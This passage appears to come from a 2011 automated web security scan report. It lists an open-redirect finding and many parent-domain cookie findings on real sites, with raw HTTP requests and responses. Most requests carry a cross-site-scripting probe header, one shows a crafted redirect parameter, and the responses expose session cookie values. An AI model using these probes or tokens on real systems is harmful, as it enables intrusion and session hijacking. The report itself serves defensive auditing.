13.3. http://www.researchbynet.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.researchbynet.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a5e86ebea15dc498a/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /favicon.ico?.a5e86ebea15dc498a/=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.researchbynet.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 04 May 2011 03:15:05 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Keep-Alive: timeout=5
Location: http://www.consumercontact.com?.a5e86ebea15dc498a/=1

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

14. Cookie scoped to parent domain  previous  next
There are 52 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


14.1. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1/statuses/user_timeline.json?screen_name=BurtGoldman&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=5&clientsource=TWITTERINC_WIDGET&1304488441548=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:54:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304470443-61830-19084
X-RateLimit-Limit: 150
ETag: "dd68325e1e1b5638c5389e4667a03d55"-gzip
Last-Modified: Wed, 04 May 2011 00:54:03 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.03865
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114cafd8234
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 66b24857cdd9bcac2a95764546ecce88dea50cec
X-RateLimit-Reset: 1304474043
Set-Cookie: k=173.193.214.243.1304470443781224; path=/; expires=Wed, 11-May-11 00:54:03 GMT; domain=.twitter.com
Set-Cookie: original_referer=ZLhHHTiegr%2FtFJS817TPehDfOh7Oz%2FB4ymznqD0OvVyy7XSdf6Js7w%3D%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCAxXf7gvAToHaWQiJWUyZjE0MDNlMDAzMWRk%250AMTkyYThiYjdkYTZmMTg0ZGJhIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--b0bc3bdcb0dce34b76541769069a6e9c050baa72; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 9192

TWTR.Widget.receiveCallback_1([{"text":"Energy and Healing \u201cDear Burt\u201d Volume 81 http:\/\/bit.ly\/lZE1j8","truncated":false,"place":null,"coordinates":null,"favorited":false,"id_str":"638961
...[SNIP]...

14.2. http://www.bodybyvi.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bodybyvi.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bodybyvi.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: application/octet-stream; charset=utf-8
Expires: 4/27/2011 12:46:52 AM
Last-Modified: Thu, 05 May 2011 00:46:52 GMT
Location: /Resource/html/images/favicon.ico/usa/eng
Server: Microsoft-IIS/7.5
Set-Cookie: sessionid=1a916651e0cae33f411ab101390c4114; domain=.bodybyvi.com; path=/
X-Powered-By: SOLX
Date: Wed, 04 May 2011 00:46:51 GMT
Content-Length: 170

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fResource%2fhtml%2fimages%2ffavicon.ico%2fusa%2feng">here</a>.</h2>
</body></html>

14.3. http://www.cowboom.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cowboom.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cowboom.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 404 Not Found
Set-Cookie: acecookie=R1194250388; path=/
Connection: close
Date: Wed, 04 May 2011 01:05:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
EXPIRES: -1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 04 May 2011 01:05:53 GMT
Set-Cookie: acecookie=R3379086043; path=/
Set-Cookie: CFID=50798381; path=/; domain=.cowboom.com; HttpOnly
Set-Cookie: CFTOKEN=f0fdb3d7e478f510-B88A2A0D-ADAA-4D4F-DF477DF4655C3232; path=/; domain=.cowboom.com; HttpOnly


                                                       <html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--[if lt IE 7]>
<style type="text/css" media="sc
...[SNIP]...

14.4. http://www.dairylandauto.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dairylandauto.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dairylandauto.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
Date: Wed, 04 May 2011 03:58:05 GMT
Vary: *
Set-cookie: NLSessionCwwwdairylandautocom=S5QjiK0Y3GEy8y7Amjyfhf8YRUyM6ZVOTixUZypIbSquzcDEIuszmWI/2EwchyDXe38Bx44236i4NUuFCBkLv7Pq4XN8E137zJ2NVCjmIdjaiCr0jsMUOCHwIeRQiFpr;path=/;domain=dairylandauto.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

14.5. http://www.enginebuildermag.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.enginebuildermag.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.enginebuildermag.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 01:14:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fd5ubhmhmp1kvc4550iipobw; domain=enginebuildermag.com; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 830


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Not
...[SNIP]...

14.6. http://www.nobelcom.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nobelcom.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nobelcom.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache,max-age=1800
Set-Cookie: JSESSIONID=abcg2Sy5PoJdmaEx9I4_s; domain=.nobelcom.com; path=/
Content-Type: text/html
Date: Wed, 04 May 2011 01:07:42 GMT
Content-Length: 30526


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>


   <title>Phone Cards from NobelCom.com for domestic and international use</title>
   <meta name=
...[SNIP]...

14.7. http://www.thehealthplan.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.thehealthplan.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thehealthplan.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: 0
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2007.11.07T08:52-0500" exp "2007.11.07T12:00-0500" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Set-Cookie: CFID=13104831;domain=.thehealthplan.com;expires=Fri, 26-Apr-2041 04:16:44 GMT;path=/
Set-Cookie: CFTOKEN=27842674;domain=.thehealthplan.com;expires=Fri, 26-Apr-2041 04:16:44 GMT;path=/
Set-Cookie: JSESSIONID=9430fb20c9531d41550077445351f367c726;path=/
Set-Cookie: COOKIESENABLED=true;expires=Thu, 05-May-2011 04:16:44 GMT;path=/
Set-Cookie: TLTSID=18F4EB764C1C16EC8B746AAD40945A04; Path=/; Domain=.thehealthplan.com
Set-Cookie: TLTUID=18F4EB764C1C16EC8B746AAD40945A04; Path=/; Domain=.thehealthplan.com expires=Wed, 04-05-2021 04:16:44 GMT
Date: Wed, 04 May 2011 04:16:44 GMT
Connection: close

           
                                                                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...

14.8. http://admeld.adnxs.com/usersync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII3I4BEAoYASABKAEw5pj87QQQ5pj87QQYAA..; uuid2=2724386019227846218; anj=Kfu=8fG7*@D>7)*0s]#%2L_'x%SEV/i#-5O4FSlRQHqgVr*.vWOENK)ehqWnCsma+$+8hH(K#:4%p3G.v:Z.zDUs_uD`k?idandj8<b_]+Y9)>JxbT-:TrPyR16f>Ne2L7Lz8m^OiiIAJm'jVZEtjuJe$ztL5<-LfW$dXNID7L9mpq(4KKA%VbltLY4eg0$+7#i$q][=3NPKm9PdYU3jeeGKw$iuu$l7(CzVfnEs:6ds3O/53VXJO>l`mQfRy7#>R9s8Gp7?hk^0.X(K:DxR!xu4bKbqa9mrd.?BNS%+<^MUg`c=6U(h<CU!c+81]xA>Sq9y>MmdLRoi#9l24%8e!G9^p8qI)5d<wou'EE<Q4XP=qFe+1Pw8a5e'3-gc4]Adf3p7=/[iQh-:^]yg$pQmdw2xvaX7'fJOCs>R:a43MLOOsrwE*7eD2io=(L6aU8?@-i+J([k/@1oAQ-cih!w=Tvx:(KWA/7i6ARW]l[9>^gfZdqwm4^*Q]M_@X>`PVGCmzFdLtLD05UF'2hjamcs)la=wvWbosXT/%h`Z4EXqQBXL=5LlruN$pcGk].jcuIeJh^o#@0h2+[<_K%TW)KFDNs8G?>Y%.8^aIc/)Z<Q

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 05-May-2011 01:28:57 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Tue, 02-Aug-2011 01:28:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Wed, 04 May 2011 01:28:57 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

14.9. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=3000023&rn=1187239486&c7=http%3A%2F%2Fnews.cnet.com%2Fwebware%2F&c8=Webware%20-%20Cool%20Web%20apps%20for%20everyone%20-%20CNET&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Wed, 04 May 2011 01:28:53 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Fri, 03-May-2013 01:28:53 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


14.10. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.truewoman.com%2f%3fid%3d1369 HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=014020a0g0h1ljtllpxzt1rw0fxzt1rw0fxzt1tzu; adh=1lkkxr816014qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh0rw0f00u3e0g0j0g50g; rdrlst=41j157rlklhm4000000013e0115smlkb5u20000000k3e0g15sklkkpqq000000093e090hsnlkb5u20000000k3e0g0m7alkkxrb000000063e060x1blkkpqq000000093e090hsplkkpqq000000093e090m7flkkyyl000000043e0412gdlkkyy0000000053e050morlkkxrb000000063e061196lkkkbe0000000f3e0f1195lkkpqh0000000a3e0a1194lkkjj40000000g3e0g0dlxlkb5u20000000k3e0g0znmlk34620000000p3e0g140rlkb5u20000000k3e0g1193lkkplo0000000c3e0c008slklhm4000000013e010p46lkkpqq000000093e091192lkkpke0000000e3e0e10tylkkpku0000000d3e0d0p1blkb5u20000000k3e0g0moylkl0r5000000023e020zr4lkb5u20000000k3e0g00bvlk9pe80000000l3e0g15xylk60qe0000000o3e0g10poljyxb40000000r3e0g0e6llkl0r5000000023e0210telkd7nq0000000j3e0g0c9slk9pe80000000l3e0g10rdlkdkly0000000h3e0g0mj2lkkxrb000000063e06159olk8fax0000000m3e0g0kualkkpqq000000093e090m0ulkl0r5000000023e020m45lkl0r5000000023e020m0plkkxrb000000063e060m40lkkxrb000000063e060mjelkkxrb000000063e0612qnlkkplt0000000b3e0b167blkl0r5000000023e020bo8lkb5u20000000k3e0g0mjjlkl0r5000000023e021672lkkxrb000000063e060lw5lkb5u20000000k3e0g0zaalkb5u20000000k3e0g13bolk7p6z0000000n3e0g1203lkb5u20000000k3e0g1204lkkyy0000000053e05137rlkkpqq000000093e09137qlkb5u20000000k3e0g0afqlkb5u20000000k3e0g0o0vlkkpqx000000083e080z2ilkkxrb000000063e060ni1lkb5u20000000k3e0g; sglst=20p0sc80lkb5u209jqc0063e000j00500ag2lkd7nq089ye00j3e0g0j0g50gc81lkkpke0000000e3e0e0j0e50ea6slkkpke0000000e3e0e0j0e50e9rslkkpke00s1q00e3e0e0j0e50eam5lkkxr8002zw0073e070j075070kllklhm4000000013e010j015019q5lkb5u20abs200k3e0g0j0g50gdgflkkpke00s1q00e3e0e0j0e50e0t7ljyxb40mkb000r3e0g0j0g50gbo0lkb5u209jqc00k3e0g0j0g50gbo1lkkyy000io40053e050j05505aoplkb5u209jqc0063e000j00500d86lklhm4000000013e010j01501942lkb5u20abs200k3e0g0j0g50g8ndlkb5u20abs200k3e0g0j0g50g719lkb5u209jqc0063e000j0050071alkkpke00s1q00e3e0e0j0e50e56blkb5u20abs200k3e0g0j0g50gasulkb5u209jqc0063e000j00500dgilkb5u209jqc0063e000j005004wclkb5u209jqc0063e000j005008eklkkpke00s1q00e3e0e0j0e50e5mrlkb5u20abs200k3e0g0j0g50gbwjlkkyy000io40053e050j05505; vstcnt=417k010r074fduc118e10a24f7qr118e10822te10tq10a24uzg6118e10023sti11hj10a24fgv9118e10824eflo118e1042

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=014020a0g0h1ljtllpxzt1tr38xzt1tr38xzt1tr38; Domain=media6degrees.com; Expires=Mon, 31-Oct-2011 01:12:33 GMT; Path=/
Set-Cookie: adh=1lkkxr816014qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Mon, 31-Oct-2011 01:12:33 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh0tr3800v3f010j0h50h; Domain=media6degrees.com; Expires=Mon, 31-Oct-2011 01:12:33 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=421157rlklhm4000000023f01157olkncox000000013f0115hnlkncox000000013f0115smlkb5u20000000l3f0115sklkkpqq0000000a3f010hsnlkb5u20000000l3f010m7alkkxrb000000073f010x1blkkpqq0000000a3f010hsplkkpqq0000000a3f010m7flkkyyl000000053f0112gdlkkyy0000000063f010morlkkxrb000000073f0114rzlkncox000000013f011196lkkkbe0000000g3f011195lkkpqh0000000b3f011194lkkjj40000000h3f0115azlkncox000000013f010dlxlkb5u20000000l3f0114hplkncox000000013f0114helkncox000000013f010znmlk34620000000q3f011193lkkplo0000000d3f011192lkkpke0000000f3f010p46lkkpqq0000000a3f01008slklhm4000000023f010moylkl0r5000000033f010p1blkb5u20000000l3f0110tylkkpku0000000e3f010zr4lkb5u20000000l3f0100bvlk9pe80000000m3f0115xylk60qe0000000p3f0110poljyxb40000000s3f010e6llkl0r5000000033f0110telkd7nq0000000k3f0113uglkncox000000013f010c9slk9pe80000000m3f0113rclkncox000000013f0110rdlkdkly0000000i3f0115j8lkncox000000013f010mj2lkkxrb000000073f01159olk8fax0000000n3f010kualkkpqq0000000a3f010m0ulkl0r5000000033f01163rlkncox000000013f011517lkncox000000013f010m45lkl0r5000000033f010m0plkkxrb000000073f010m40lkkxrb000000073f010mjelkkxrb000000073f0112qnlkkplt0000000c3f01167blkl0r5000000033f010bo8lkb5u20000000l3f011393lkncox000000013f0114xolkncox000000013f010mjjlkl0r5000000033f011672lkkxrb000000073f010lw5lkb5u20000000l3f0116avlkncox000000013f010zaalkb5u20000000l3f011203lkb5u20000000l3f0115rmlkncox000000013f01163clkncox000000013f01137rlkkpqq0000000a3f011204lkkyy0000000063f01137qlkb5u20000000l3f0114j9lkncox000000013f010afqlkb5u20000000l3f010o0vlkkpqx000000093f0114ozlkncox000000013f0114bzlkncox000000013f010z2ilkkxrb000000073f0113ovlkncox000000013f010ni1lkb5u20000000l3f01; Domain=media6degrees.com; Expires=Mon, 31-Oct-2011 01:12:33 GMT; Path=/
Set-Cookie: sglst=2280s9k1lkncox000000013f010j01501arllkncox000000013f010j01501dsolkncox000000013f010j015019rslkkpke02n4j00f3f010j0f50fam5lkkxr8002zw0083f010j08508cd4lkncox000000013f010j01501c6rlkncox000000013f010j01501d9dlkncox000000013f010j01501crhlkncox000000013f010j01501cy4lkncox000000013f010j015018wulkncox000000013f010j01501aoplkb5u209jqc0063e000j005008dklkncox000000013f010j01501cnxlkncox000000013f010j01501aoilkncox000000013f010j01501bvplkncox000000013f010j015018stlkncox000000013f010j01501942lkb5u20c6uv00k3e000j005008ndlkb5u20c6uv00k3e000j005009uklkncox000000013f010j01501bvdlkncox000000013f010j01501c5glkncox000000013f010j0150156blkb5u20c6uv00k3e000j00500cdvlkncox000000013f010j01501bjrlkncox000000013f010j01501asulkb5u209jqc0063e000j00500dcglkncox000000013f010j01501crplkncox000000013f010j015016enlkncox000000013f010j01501dcnlkncox000000013f010j01501asqlkncox000000013f010j015018k2lkncox000000013f010j015018gflkncox000000013f010j01501dc3lkncox000000013f010j01501c60lkncox000000013f010j015017pdlkncox000000013f010j01501d27lkncox000000013f010j01501ceqlkncox000000013f010j01501cstlkncox000000013f010j01501720lkncox000000013f010j0150180slkncox000000013f010j01501c80lkb5u209jqc0063e000j00500ag2lkd7nq0a51700k3f010j0h50hc1elkncox000000013f010j01501c81lkkpke02n4j00e3e000j00500a6slkkpke02n4j00e3e000j00500dnalkncox000000013f010j015019z6lkncox000000013f010j015019q4lkncox000000013f010j015010kllklhm4000000023f010j025029gslkncox000000013f010j01501b3zlkncox000000013f010j015019q5lkb5u20c6uv00k3e000j005005nklkncox000000013f010j015019mjlkncox000000013f010j01501dgflkkpke02n4j00f3f010j0f50f0t7ljyxb40ofdt00s3f010j0h50hbo0lkb5u20c6uv00l3f010j0h50h9pilkncox000000013f010j01501bo1lkkyy002dqx0053e000j00500c8glkncox000000013f010j01501d86lklhm401v2t0013e000j00500cwalkncox000000013f010j01501dqmlkncox000000013f010j01501dg4lkncox000000013f010j01501d84lkncox000000013f010j015019c9lkncox000000013f010j01501719lkb5u20c6uv0073f010j0250271alkkpke02n4j00e3e000j00500dgilkb5u209jqc0063e000j00500d3dlkncox000000013f010j015014wclkb5u20c6uv0073f010j02502a0ulkncox000000013f010j015015mrlkb5u20c6uv00l3f010j0h50h8eklkkpke02n4j00e3e000j005008ejlkncox000000013f010j015015jilkncox000000013f010j01501bwjlkkyy002dqx0063f010j06506dnklkncox000000013f010j015019gflkncox000000013f010j01501; Domain=media6degrees.com; Expires=Mon, 31-Oct-2011 01:12:33 GMT; Path=/
Set-Cookie: vstcnt=417k010r0t4exp6103210e24ru4y1032107249v4u10pj10e22te10tq10a24tmhw103210924pq44103210a24eflo218e104203210724eyja103210e24mqca103210e24fvio118e10f24fz24103210924e8bw103210824fsuv103210924fduc118e10a24uzdp103210b24dret103210724gqhl103210923sti11hj10a24styu10321092451gt10pj10e24fj52103210924o2lt103210a24m1v2103210a24f7qr218e108203210924uzg6218e100203210024fgv9218e108203210a24tfmw103210b23l4f103210a24kd6k103210c2; Domain=media6degrees.com; Expires=Mon, 31-Oct-2011 01:12:33 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?t=2&id=1280694&id=1277220&id=1277246&id=1272897&id=1266306&id=1265429&id=1265045&id=1264304&id=1261149&id=1261510&id=1259052&id=1258217&id=1256778&id=1256769&id=1256838&id=1256592&id=1247538&id=1246219&id=1242596&id=1230500
Content-Length: 0
Date: Wed, 04 May 2011 01:12:33 GMT


14.11. http://ds.addthis.com/red/psi/sites/www.truewoman.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.truewoman.com/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.truewoman.com/p.json?callback=_ate.ad.hpr&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.truewoman.com%2F%3Fid%3D1369&ref=http%3A%2F%2Fwww.truewoman.com%2F&o1bgp HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=1304384619.60|1304384619.1FE|1304290797.1OD; dt=X; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 313
Content-Type: text/javascript
